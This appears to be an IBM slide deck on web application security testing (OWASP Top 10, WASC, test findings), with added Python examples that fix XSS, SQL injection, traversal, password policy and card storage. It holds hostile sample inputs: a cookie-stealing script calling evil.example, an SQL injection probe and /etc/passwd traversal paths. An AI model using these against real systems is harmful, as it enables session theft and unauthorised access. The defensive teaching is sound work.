Figure: deployment diagram showing web servers, application backend servers and databases behind a firewall, with the share of attacks and of losses attributed to each layer:

Layer              % of attacks   % of dollars
Web applications   75%            90%
Network / server   25%            10%
• Identity theft
Hacker impersonates a trusted user
• Remote execution
Execute arbitrary code on the server
Figure: testing approaches plotted by cost per application tested against application coverage; the labelled points are External security (tactical), Internal (tactical) and Strategic (operationalized).
OWASP Top 10 (2013)

• Injection Flaws: Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
• Broken Authentication and Session Management: Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
• Cross-Site Scripting (XSS): XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
• Insecure Direct Object Reference: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
• Security Misconfiguration: Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
• Sensitive Data Exposure: Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
• Missing Function Level Access Control: Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
• Cross-Site Request Forgery (CSRF): A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
• Using Components with Known Vulnerabilities: Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
• Unvalidated Redirects and Forwards: Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
© Copyright IBM Corporation 2014
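Added example (Python; not from the original slides): how the XSS flaw described above arises and how output escaping closes it. The same untrusted display name is rendered once by string concatenation and then in three escaped contexts (HTML element content, an HTML attribute, a JavaScript string literal), because the correct escaping depends on where the value lands. The hostile display name and the page templates are constructed for this example.

```python
import html
import json

# Constructed sample input: a display name submitted by a user. It carries a
# script that would send the victim's session cookie to an attacker's host.
HOSTILE_NAME = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_greeting_vulnerable(name: str) -> str:
    """Untrusted data concatenated straight into the page (the XSS defect).
    The browser cannot tell the user's text from the page's own markup, so the
    <script> in `name` runs with the victim's session."""
    return f"<p>Welcome back, {name}!</p>"


def render_greeting_escaped(name: str) -> str:
    """Same page with the value escaped for HTML element content: < > & " '
    become entities, so they are rendered as text and never parsed as tags."""
    return f"<p>Welcome back, {html.escape(name)}!</p>"


def render_attr_escaped(name: str) -> str:
    """Attribute context: quote the attribute AND escape quotes (quote=True), so
    the value cannot close the attribute and start another one (e.g. onload=)."""
    return f'<input type="text" name="display" value="{html.escape(name, quote=True)}">'


def render_js_escaped(name: str) -> str:
    """JavaScript context: emit the value as a JSON string literal and replace
    angle brackets with \\u003c / \\u003e, so a value containing "</script>"
    cannot terminate the script element early."""
    literal = json.dumps(name).replace("<", "\\u003c").replace(">", "\\u003e")
    return f"<script>var displayName = {literal};</script>"


def payload_survives(markup: str) -> bool:
    """True if the hostile input is still present verbatim in the rendered
    output, i.e. a browser would execute it."""
    return HOSTILE_NAME in markup


if __name__ == "__main__":
    for renderer in (render_greeting_vulnerable, render_greeting_escaped,
                     render_attr_escaped, render_js_escaped):
        out = renderer(HOSTILE_NAME)
        print(f"{renderer.__name__:28s} executable payload: {payload_survives(out)}")
        print("   ", out)
```

Escaping is applied at output time, per context; input validation on the way in does not replace it, because the same value may later be emitted into a context the validator never considered.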
WASC
• Web Application Security Consortium (WASC): its purpose is to develop, adopt, and advocate standards for Web application security
• Authorization
Attacks that target a Web site's method of determining if a user, service, or application has
the necessary permissions to perform a requested action
• Client-side attacks
Attacks that abuse or exploit a Web site user's system
• Command execution
Attacks designed to execute remote commands on the Web site
• Information disclosure
Attacks designed to acquire system specific information about a Web site
• Logical Attacks
Attacks that abuse or exploit a Web application's logic flow
Chart: the most common vulnerability classes, as % of vulnerabilities found and % of sites affected: Cross-site scripting, Information leakage, SQL injection, Predictable resource location.
Data from: http://www.webappsec.org/projects/statistics/
Types of Security Test Assignments
There are distinct testing techniques that can be used for security tests:
Black Box Testing
No information is provided about the target
White Box Testing
Information about the target is provided to assist the test, including logon details and in some cases source code
Traditionally used in functional and unit test cycles
Grey Box Testing
A mixture of black and white box; provides the most detailed analysis of the target
Diagram: test assignment workflow with the steps Define Roles, Approve Test, Target Application (Dynamic Analysis, Static Analysis), Schedule Retest and Close Assignment.
• Parameter Tampering: Modifying parameters which form part of the URL or hidden HTML form fields
• Forced Parameter: Tampering with debug and test flags within the passed code to change the nature of the application
• Cross Site Scripting: Injection of script into unsanitised input fields (can lead to phishing attacks)
• SQL Injection: Passing SQL code into unsanitised input fields
• Buffer Overflow: Sending more data into a buffer than it can hold; the overflow may overwrite adjacent memory and cause the 'extra' data to be executed
• Direct Access Browsing: Browsing directly to directories or pages on the server, bypassing any authentication
• Directory Traversal: Traversing up the web server's directory structure in order to reach files outside the web root
• Form Manipulation: Exploiting credentials that are passed in plain text within the HTTP POST request
• Information Disclosure: Returning unnecessary system and database information which can aid an attack
• Database Configuration Issues
• Phishing Attacks
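Added example (Python; not from the original slides) for two of the input-handling flaws in the table above, which are also the OWASP Injection and Insecure Direct Object Reference entries earlier on the page: a login query with the attacker's input spliced into the SQL next to the parameterised version, and a path resolver that confines a requested file to the web root. The users table, the credentials and the document root `/var/www/html` are constructed for this example.

```python
import posixpath
import sqlite3
from urllib.parse import unquote

# ---------- SQL injection: the vulnerable query beside the parameterised one ----------

def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Untrusted input spliced into the SQL text. A password of  ' OR '1'='1
    rewrites the WHERE clause to  ... AND password = '' OR '1'='1'  which is
    true for every row, so the query returns every user."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters. The statement's structure is fixed before
    the values are supplied, so quote characters in the input are just data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# ---------- Directory traversal: confining a requested path to the web root ----------

WEB_ROOT = "/var/www/html"   # assumed document root for the example


def resolve_under_root(requested: str, root: str = WEB_ROOT):
    """Map a URL path onto a filesystem path, or return None if it would escape
    `root`. Decodes twice to catch %252e%252e, normalises '..' and '.', and
    rejects NUL bytes. This is a lexical check only: a real file server should
    also call os.path.realpath on the result so a symlink inside root cannot
    point outside it."""
    decoded = unquote(unquote(requested)).replace("\\", "/")
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print("vulnerable   :", login_vulnerable(db, "alice", probe))     # ['alice', 'bob']
    print("parameterised:", login_parameterised(db, "alice", probe))  # []
    for path in ("index.html", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{path:30s} -> {resolve_under_root(path)}")
```

The parameterised query is the fix for the injection row; for the traversal row the essential step is normalising before the root check, since checking the raw string for `..` misses encoded and mixed-separator variants.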
Recommend: The cover letter function should employ full input control, preventing or sanitising the use of special characters. Further, the email selection should be limited to validated email accounts, thus preventing the spam potential.
Password Policy Control – MEDIUM (5.5/10)

Requirement                                        Result   Explanation
Username at least 8 chars                          Passed   Password policy forces at least 8 characters
Username and password cannot match                 Failed   Possible to make these match by changing the user ID; doing this forces a password change
Enforce password history                           Failed   Changed password to the same value several times; likely a business decision to allow this
Maximum password age                               NR       Not enough time to test
Account locked out after 3 unsuccessful logins     Failed   Account was locked out after 11 unsuccessful attempts; not best practice
Passwords must meet complexity requirements:
  - at least 8 characters                          Passed   Password enforced to 8 chars only
  - English upper case (A-Z)                       Passed   Password forced mixed characters and numerics
  - English lower case (a-z)                       Passed   Password forced mixed characters and numerics
  - base 10 digits (0-9)                           Passed   Password forced mixed characters and numerics
  - non-alphanumeric (e.g. $, !)                   Passed   Password forced mixed characters and numerics
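Added example (Python; not from the original slides) implementing the controls the table above tests: the complexity rules, the username/password mismatch rule, password history, and lockout after three consecutive failures rather than the eleven observed. The account model, the PBKDF2 storage and the history depth of five are assumptions for the example; the slide only records that history was not enforced.

```python
import hashlib
import hmac
import os
import re

# Policy values taken from the requirements column of the table.
MIN_LENGTH = 8
LOCKOUT_THRESHOLD = 3
HISTORY_DEPTH = 5          # assumed depth; the table does not state one
PBKDF2_ROUNDS = 100_000


def check_complexity(username: str, password: str) -> list:
    """Return the requirements the password fails (an empty list means it passes)."""
    failures = []
    if len(password) < MIN_LENGTH:
        failures.append(f"shorter than {MIN_LENGTH} characters")
    if password.lower() == username.lower():
        failures.append("password matches username")
    for pattern, label in ((r"[A-Z]", "upper case"), (r"[a-z]", "lower case"),
                           (r"[0-9]", "digit"), (r"[^A-Za-z0-9]", "non-alphanumeric")):
        if not re.search(pattern, password):
            failures.append(f"no {label} character")
    return failures


def _derive(password: str, salt: bytes) -> bytes:
    """Salted, slow one-way derivation so stored values are not reversible."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class Account:
    """Minimal account model enforcing complexity, history and lockout."""

    def __init__(self, username: str, password: str):
        self.username = username
        self.history = []          # (salt, derived key) pairs, newest last
        self.failed_attempts = 0
        self.locked = False
        failures = check_complexity(username, password)
        if failures:
            raise ValueError(failures)
        self._store(password)

    def _store(self, password: str) -> None:
        salt = os.urandom(16)
        self.history.append((salt, _derive(password, salt)))
        del self.history[:-HISTORY_DEPTH]      # keep only the last HISTORY_DEPTH

    def change_password(self, new_password: str) -> list:
        """Return failures; when the list is empty the password has been changed."""
        failures = check_complexity(self.username, new_password)
        if any(hmac.compare_digest(_derive(new_password, salt), key)
               for salt, key in self.history):
            failures.append(f"reused one of the last {HISTORY_DEPTH} passwords")
        if not failures:
            self._store(new_password)
        return failures

    def login(self, password: str) -> bool:
        """Reject while locked; lock after LOCKOUT_THRESHOLD failures in a row."""
        if self.locked:
            return False
        salt, key = self.history[-1]
        if hmac.compare_digest(_derive(password, salt), key):
            self.failed_attempts = 0
            return True
        self.failed_attempts += 1
        if self.failed_attempts >= LOCKOUT_THRESHOLD:
            self.locked = True
        return False


if __name__ == "__main__":
    print("weak password fails:", check_complexity("jsmith", "jsmith"))
    acct = Account("jsmith", "Tr0ub4dor&3")
    print("reuse rejected:", acct.change_password("Tr0ub4dor&3"))
    for guess in ("wrong", "wrong", "wrong"):
        acct.login(guess)
    print("locked after 3 failures:", acct.locked)
```

The history check has to re-derive the candidate against every stored salt, which is why the depth is kept small; a lockout counter that only resets on success is what turns the eleven attempts seen in the test into three.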
Recommend:
PCI Standards require that the Primary Account Number (PAN), at minimum, be rendered unreadable anywhere it is stored by using any of the following approaches:
Strong one-way hash functions (hashed indexes)
Truncation
Index tokens and pads (pads must be securely stored)
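Added example (Python; not from the original slides) of the three approaches listed above applied to a card number: truncation to the first six and last four digits, a keyed one-way hash for a searchable index, and an index token whose mapping lives in a separate vault. The PAN used is the well-known Visa test number, the HMAC key is a placeholder standing in for a key held in an HSM or KMS, and the vault is a dictionary. The caveat a practitioner will want: a plain, unkeyed hash of a PAN is not "unreadable", because with the issuer BIN known only about a billion Luhn-valid candidates remain and they can be enumerated; later versions of PCI DSS accordingly require the hash to be keyed.

```python
import hashlib
import hmac
import secrets

TEST_PAN = "4111111111111111"   # well-known test number, not a live card
# Assumption: in production the hash key lives in an HSM/KMS and is never stored
# next to the hashed values; a fixed byte string stands in for it here.
HASH_KEY = b"replace-with-a-key-held-in-the-hsm"


def luhn_valid(pan: str) -> bool:
    """Luhn check: every second digit from the right is doubled (minus 9 if > 9)."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def truncate_pan(pan: str) -> str:
    """Truncation: keep at most the first six and last four digits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def unkeyed_sha256(pan: str) -> str:
    """What NOT to store: with the BIN known, roughly 10^9 Luhn-valid PANs remain
    per BIN, so a plain hash is reversible by brute force."""
    return hashlib.sha256(pan.encode()).hexdigest()


def hash_pan(pan: str, key: bytes = HASH_KEY) -> str:
    """Keyed one-way hash (HMAC-SHA-256): without the key the brute force above
    is not possible, yet equal PANs still map to equal values, so the column
    can serve as a lookup index."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


class TokenVault:
    """Index tokens: the application stores a random token; the token-to-PAN
    map lives in a separately secured vault (a dict here). The token carries
    no information about the PAN."""

    def __init__(self):
        self._pan_by_token = {}

    def tokenize(self, pan: str) -> str:
        if not luhn_valid(pan):
            raise ValueError("not a valid PAN")
        token = secrets.token_hex(8)          # 16 hex chars, unrelated to the PAN
        self._pan_by_token[token] = pan
        return token

    def detokenize(self, token: str):
        return self._pan_by_token.get(token)


if __name__ == "__main__":
    print("truncated :", truncate_pan(TEST_PAN))
    print("HMAC index:", hash_pan(TEST_PAN)[:16], "...")
    vault = TokenVault()
    token = vault.tokenize(TEST_PAN)
    print("token     :", token, "->", vault.detokenize(token))
```

Truncation is irreversible and needs no secret, so it is the right choice wherever the full number is never needed again; the keyed hash and the token vault both depend on a secret (the key, or the vault contents) that must be protected at least as well as the PAN itself.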